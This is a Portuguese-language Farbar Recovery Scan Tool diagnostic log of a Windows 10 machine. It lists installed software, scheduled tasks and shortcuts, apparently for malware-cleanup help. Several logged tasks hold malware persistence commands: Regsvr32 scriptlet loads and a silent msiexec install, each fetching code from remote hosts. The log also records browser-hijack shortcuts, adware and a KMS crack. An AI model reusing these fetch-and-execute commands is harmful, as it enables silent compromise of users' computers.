Document format: text/plain

Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 23-04-2017 01
Executado por ADEMIR MONTEIRO (25-04-2017 18:25:51)
Executando a partir de C:\Users\ADEMIR MONTEIRO\Downloads
Windows 10 Home Single Language Versão 1607 (X64) (2016-10-22 16:38:13)
Modo da Inicialização: Normal
==========================================================


==================== Contas: =============================

ADEMIR MONTEIRO (S-1-5-21-1492537628-2073842835-3753687853-1001 - Administrator - Enabled) => C:\Users\ADEMIR MONTEIRO
Administrador (S-1-5-21-1492537628-2073842835-3753687853-500 - Administrator - Disabled)
Convidado (S-1-5-21-1492537628-2073842835-3753687853-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-1492537628-2073842835-3753687853-503 - Limited - Disabled)

==================== Central de Segurança ========================

(Se uma entrada for incluída na fixlist, será removida.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas Instalados ======================

(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)

Adobe Acrobat Reader DC - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated)
Apple Mobile Device Support (HKLM\...\{DB18F1C0-846F-46F5-A074-5B97C8AF5C8E}) (Version: 10.3.1.2 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{52D87F32-70E4-4348-8148-C0B9F35B1314}) (Version: 2.3.0.177 - Apple Inc.)
Assistente de Atualização do Windows 10 (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.17364 - Microsoft Corporation)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Call of Duty(R) 4 - Modern Warfare(TM) Demo (HKLM-x32\...\InstallShield_{6734CA10-8FB8-4C7F-B8C7-75317C617DC5}) (Version: 1.00.0000 - Activision)
Call of Duty(R) 4 - Modern Warfare(TM) Demo (x32 Version: 1.00.0000 - Activision) Hidden
Chromium (HKLM-x32\...\{1D62F5A2-4DE2-2422-FC62-54A22CE28722}) (Version: - )
Citrix Online Launcher (HKLM-x32\...\{6740FE60-43C1-4D15-8C4A-001624134B14}) (Version: 1.0.312 - Citrix)
CyberLink Media Suite Essentials (HKLM-x32\...\InstallShield_{8F14AA37-5193-4A14-BD5B-BDF9B361AEF7}) (Version: 11.0 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.8.1.70 - Dell Inc.)
Dell Data Vault (Version: 4.2.2.0 - Dell Inc.) Hidden
Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP)
Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.3.6855.212 - Dell)
Dell SupportAssistAgent (HKLM-x32\...\{287348C8-8B47-4C36-AF28-441A3B7D8722}) (Version: 1.0.3.60494 - Dell)
Dell System Detect (HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\d24084d039586cae) (Version: 8.4.0.5 - Dell)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 19.0.9.4 - Synaptics Incorporated)
Dell Update - SupportAssist Update Plugin (HKLM\...\{5F641343-FA40-4084-855A-7FA3251783DC}) (Version: 2.0.2.1840 - Dell Inc.)
Dell Update (HKLM-x32\...\{DB82968B-57A4-4397-81A5-ECAB21B5DFCD}) (Version: 1.7.1015.0 - Dell Inc.)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.)
EPSON L555 Series Printer Uninstall (HKLM\...\EPSON L555 Series) (Version: - SEIKO EPSON Corporation)
Euro Truck Simulator 2 (HKLM-x32\...\{1B705E8F-9893-4486-B5D7-4F7FEB9C871E}_is1) (Version: 1.12.1 - SCS Software)
Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited)
Galeria de Fotos (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.33.3 - Google Inc.) Hidden
GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.3.0.1121 - Citrix Online, a division of Citrix Systems, Inc.)
Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1153 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
iTunes (HKLM\...\{164600BE-9CEC-44E6-9B38-2B12D5FE2342}) (Version: 12.6.0.100 - Apple Inc.)
Java 8 Update 131 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180131F0}) (Version: 8.0.1310.11 - Oracle Corporation)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Microsoft Office 365 Home Premium - pt-br (HKLM\...\O365HomePremRetail - pt-br) (Version: 15.0.4551.1512 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50906.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 - ENU (HKLM-x32\...\{AA4A4B2C-0465-3CF8-BA76-27A027D8ACAB}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 Runtime (HKLM-x32\...\{299C0434-4F4E-341F-A916-4E07AEB35E79}) (Version: 9.0.30729 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 53.0 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 53.0 (x86 pt-BR)) (Version: 53.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0 - Mozilla)
Need for Speed™ Most Wanted PC Demo (HKLM-x32\...\{E085FD28-F22C-4D41-00A1-F0751BF8EFC1}) (Version: - )
Noise Reduction Plug-In 2.0 (HKLM-x32\...\{847C6940-D852-11E2-81D2-F04DA23A5C58}) (Version: 2.0.596 - Sony)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4551.1512 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4551.1512 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4551.1512 - Microsoft Corporation) Hidden
Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation)
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.005 - Dell Inc.)
QuickTime 7 (HKLM-x32\...\{80CEEB1E-0A6C-45B9-A312-37A1D25FDEBC}) (Version: 7.78.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7544 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.2.8400.39034 - Realtek Semiconductor Corp.)
Sawbuck (HKLM-x32\...\{459BFE07-FCF3-4274-AC8B-8E8DDA7214BA}) (Version: 0.6.8.0 - Google Inc)
ScreenShot (HKLM-x32\...\ScreenShot) (Version: 2.0.4 - Filseclab Corporation)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype Web Plugin (HKLM-x32\...\{CD62BCB9-02D2-443F-AC7A-443377DA5B38}) (Version: 7.31.0.56 - Skype Technologies S.A.)
Skype™ 7.32 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.32.104 - Skype Technologies S.A.)
Software de dispositivo do Chipset Intel® (x32 Version: 10.1.1.9 - Intel(R) Corporation) Hidden
SpinTires Tech Demo (June 060613) (HKLM-x32\...\{9AF7D6F5-50A5-432C-9F7B-83BCE03B11A0}) (Version: 1.3 - Oovee)
Spotify (HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\Spotify) (Version: 1.0.49.125.g72ee7853 - Spotify AB)
Suporte para Aplicativos Apple (32-bit) (HKLM-x32\...\{05E07D23-91E9-4E70-A4CC-EF505088F967}) (Version: 5.4.1 - Apple Inc.)
Suporte para Aplicativos Apple Apple (64-bit) (HKLM\...\{741291DA-2B34-4D44-8FB6-58EDE21261D8}) (Version: 5.4.1 - Apple Inc.)
The Desktop Weather 2.0.1.11389 (HKLM\...\WeatherTool) (Version: 2.0.1.11389 - ShenZhen Enode Techology co,.Ltd) <==== ATENÇÃO
Unity Web Player (HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\UnityWebPlayer) (Version: 5.0.1f1 - Unity Technologies ApS)
VDownloader 4.5.2737 (HKLM\...\{A7E19604-93AF-4611-8C9F-CE509C2B286E}_is1) (Version: - Vitzo Limited)
vSnapshot 1.0.0.0 (HKLM\...\{F772C08D-9F61-45c6-982F-ADDEEE0D92C6}) (Version: 1.0.0.0 - ShenZhen Zhihuimen Techology co,.Ltd)
Warsaw 1.3.1 (HKLM-x32\...\{20E60725-16C8-4FB9-8BC2-AF92C5F8D06D}_is1) (Version: 1.3.1 - GAS Tecnologia)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.20 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.20.0 - win.rar GmbH)
YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version: - ELEX DO BRASIL PARTICIPAÇÕES LTDA) <==== ATENÇÃO
Yahoo Search Set (HKLM-x32\...\Yahoo! SearchSet) (Version: - Yahoo Inc.)

==================== Exame Personalizado CLSID (Whitelisted): ==========================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== ATENÇÃO
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B0-F1D4349F0013}\InprocServer32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\GAS Tecnologia\GBBD\npsf_uni_64.dll => Nenhum Arquivo
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B1-F1D4349F0013}\InprocServer32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\GAS Tecnologia\GBBD\npsf_uni_64.dll => Nenhum Arquivo
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{A62E09B4-6467-4E0F-9B52-E61D8BC9FC69}\localserver32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\SkypePlugin\7.31.0.56\GatewayVersion-x64.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{CBF9CD8C-2714-4F36-B76A-43E6C7547BC2}\localserver32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\SkypePlugin\7.31.0.56\EdgeCalling.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{E5A7A7B5-9D06-4DBE-BAC0-04B69FF070B5}\InprocServer32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\SkypePlugin\7.31.0.56\GatewayActiveX-x64.dll (Skype Technologies S.A.)

==================== Tarefas Agendadas (Whitelisted) =============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

Task: {080BBA44-FD00-4236-B483-8B666C925A4A} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_ERROR_HB => C:\WINDOWS\system32\mrt.exe [2017-04-12] (Microsoft Corporation)
Task: {0F373340-7552-468F-805A-12372F3EBBA3} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {1070FB65-ACC2-4044-ADBB-9DE7AFFC3EA0} - System32\Tasks\{864BC306-9BC2-4E24-860C-052C2BDED33D} => launchwinapp.exe hxxp://ui.skype.com/ui/0/6.3.73.105.457/pt/go/help.faq.installer?LastError=1603
Task: {1C13CF54-132B-47A3-A9C3-46781DDE17AA} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Nenhum Arquivo <==== ATENÇÃO
Task: {1CEDBAD5-4285-4BCF-B9BB-1150C657C3AD} - \Microsoft\Windows\Setup\gwx\rundetector -> Nenhum Arquivo <==== ATENÇÃO
Task: {1FF36D07-1A84-4C32-9B78-1878EE9019A1} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1492537628-2073842835-3753687853-1001UA => C:\Users\ADEMIR MONTEIRO\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-11-09] (Facebook Inc.)
Task: {2088A7B8-A1C0-4438-B6B1-457A4C27A2DF} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== ATENÇÃO
Task: {21ECBBF7-3B97-4D47-8369-A2079A2A349E} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\integratedoffice.exe [2013-10-31] (Microsoft Corporation)
Task: {25AF1857-93F1-41E3-95BA-7EE079948513} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1YFjY5RTY1NjU8FjIdRkFdRUE8MdzXMTNQRWIxMUY8RH== scrobj.dll
Task: {32EB37C5-14B2-4DC8-9256-34ABAB7F2001} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1492537628-2073842835-3753687853-1001Core => C:\Users\ADEMIR MONTEIRO\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-11-09] (Facebook Inc.)
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe
Task: {3ADB4358-FABB-4F5A-BAEA-A331F7F5B6C1} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {3BB11FEE-9805-4E4C-A070-61E59461E07C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-04-15] (Adobe Systems Incorporated)
Task: {4325960B-88DF-4761-8F01-6B20997ABD54} - System32\Tasks\Tools_Update_{CFAC34AB-5DB5-4dea-94EC-1D42E3942873} => C:\Program Files (x86)\tools\update\tools_update.exe [2016-07-04] ()
Task: {4BC0638E-C6FE-48E2-9DC7-6B0DB4B4BA61} - System32\Tasks\R@1n-KMS\Office14ProPlus => wmic
Task: {4DCED5E7-C4D2-48E0-9465-4A9A58089B29} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Nenhum Arquivo <==== ATENÇÃO
Task: {5280B2E7-F127-40B0-AF3E-0A0674B4F874} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {595301D0-FBBC-4290-BD07-916D382DF13C} - System32\Tasks\{AD415D48-A269-4E70-981F-C480E2FD8AA6} => pcalua.exe -a "C:\Users\ADEMIR MONTEIRO\AppData\Roaming\do-search\UninstallManager.exe" -c -ptid=cor
Task: {599945A8-13E2-4CE3-9C9D-B497F82365B1} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe
Task: {6003891B-4C6E-4CE1-A27D-41743253E457} - System32\Tasks\{788B64E0-E064-4709-9A1E-A97700A54644} => pcalua.exe -a "C:\Program Files\ByteFence\ByteFence.exe" -c /uninstall
Task: {634C2AFE-2840-4A2B-AF69-81BCE86DD08E} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\ADEMIR MONTEIRO\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {748A26FA-AC85-48B7-BDE5-889E02F6BB61} - System32\Tasks\Dell SupportAssistAgent AutoUpdate => C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssist.exe [2015-04-10] (Dell Inc.)
Task: {77706C8A-94AF-4E57-B8E2-03CF78500731} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Nenhum Arquivo <==== ATENÇÃO
Task: {7791C1D9-4C84-4119-B684-5B3BC288C976} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2017-02-14] (Apple Inc.)
Task: {7A40E99D-C5E2-44C6-BB7A-8430BBD22D6C} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {8186247E-67E3-4CF6-B37C-85542BFB8F52} - System32\Tasks\googleupdatetaskmachineua => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.)
Task: {84A4D586-F069-481B-8AC3-656EF9F0018C} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated)
Task: {8DC21957-9D43-435F-A928-0AC2F312D7CE} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {A0E0CF38-7693-4DCA-A502-A10561BF1C86} - System32\Tasks\googleupdatetaskmachinecore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.)
Task: {A63F8300-1704-4F1A-ADF4-7B31FFCC23FA} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {B682F9E1-06F9-433A-803D-072B9B9DB540} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Nenhum Arquivo <==== ATENÇÃO
Task: {BDC4343F-A3A4-4507-8745-3FF497B5BDCA} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {BDDAE168-8F9C-4633-9A54-4728F4CFB574} - System32\Tasks\{8BA06421-6163-42DE-B7C9-7F08ADA59627} => launchwinapp.exe hxxp://ui.skype.com/ui/0/6.3.73.105.457/pt/abandoninstall?page=tsProgressBar
Task: {C1AC93B9-454A-437E-9027-1A2004FA261D} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> Nenhum Arquivo <==== ATENÇÃO
Task: {C4FA5E11-2718-4ACA-ABD8-7FDF57BD96B3} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\Dell\SupportAssist\uaclauncher.exe [2017-04-18] (PC-Doctor, Inc.)
Task: {C6392B5A-3A2E-4477-B098-2CA65E62ACE6} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {CC21D6E8-24A8-4ABE-8FEB-697524D453D0} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Nenhum Arquivo <==== ATENÇÃO
Task: {CD7FFAF9-0423-42E9-A52D-5840EDA92753} - \BackgroundContainer Startup Task -> Nenhum Arquivo <==== ATENÇÃO
Task: {D20A4A65-00F9-43FD-9664-28FF8CFE3DFE} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\Dell\SupportAssist\sessionchecker.exe [2017-04-18] (PC-Doctor, Inc.)
Task: {E040132B-4205-44A1-86B0-3EDAC6A6F355} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2014-01-15] (Microsoft Corporation)
Task: {E0A2BEA2-67D5-468B-87FB-8A28DC93D858} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
Task: {E9994BDE-E1BC-45EA-AB98-4106B75B5C7B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {F19A9187-9B6C-4D2C-B1D1-8E6BAA2167C4} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1YFjY5RTY1NjU8FjIdRkFdRUE8MdzXMTNQRWIxMUY8RH== scrobj.dll
Task: {F961350E-3BDD-4EB4-9FDA-1DE60446BA52} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Nenhum Arquivo <==== ATENÇÃO
Task: {FCA2EF96-3A7F-49C4-8FAC-792DC8218A12} - \WPD\SqmUpload_S-1-5-21-1492537628-2073842835-3753687853-1001 -> Nenhum Arquivo <==== ATENÇÃO

(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)

Task: C:\WINDOWS\Tasks\Dell SupportAssistAgent AutoUpdate.job => C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssist.exe
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-1492537628-2073842835-3753687853-1001Core.job => C:\Users\ADEMIR MONTEIRO\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-1492537628-2073842835-3753687853-1001UA.job => C:\Users\ADEMIR MONTEIRO\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: C:\WINDOWS\Tasks\Tools_Update_{CFAC34AB-5DB5-4dea-94EC-1D42E3942873}.job => C:\Program Files (x86)\tools\update\tools_update.exe

==================== Atalhos =============================

(As entradas podem ser listadas para serem restauradas ou removidas.)

Shortcut: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)

ShortcutWithArgument: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001
ShortcutWithArgument: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001

==================== Módulos Carregados (Whitelisted) ==============

2017-01-13 13:56 - 2017-01-13 13:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2017-03-16 16:08 - 2017-03-16 16:08 - 01354040 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-12-24 00:30 - 2016-12-24 00:30 - 00152264 _____ () C:\Program Files (x86)\vSnapshot\1.0.0.0\vSnapshotServ.exe
2016-07-10 01:16 - 2016-07-10 01:16 - 00026112 _____ () C:\Windows\KMS-R@1n.exe
2013-12-03 15:35 - 2013-08-23 14:45 - 00379560 _____ () C:\Program Files\Microsoft Office 15\ClientX64\c2rui.dll
2013-12-03 15:35 - 2013-10-31 09:08 - 00520872 _____ () C:\Program Files\Microsoft Office 15\ClientX64\c2r64.dll
2013-12-03 15:35 - 2013-10-31 09:07 - 00618152 _____ () C:\Program Files\Microsoft Office 15\ClientX64\StreamServer.dll
2016-05-30 03:24 - 2016-05-30 03:24 - 00150640 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.11389\WeatherService.exe
2016-07-10 01:16 - 2016-07-10 01:16 - 00005120 _____ () C:\WINDOWS\KMS-R@1nHook.exe
2016-07-10 01:16 - 2016-07-10 01:16 - 00004096 _____ () C:\WINDOWS\KMS-R@1nHook.dll
2017-04-17 19:19 - 2017-04-13 00:08 - 00116400 _____ () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
2016-07-16 08:42 - 2016-07-16 08:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2017-04-12 00:42 - 2017-03-28 03:22 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2017-04-12 00:42 - 2017-03-28 03:22 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
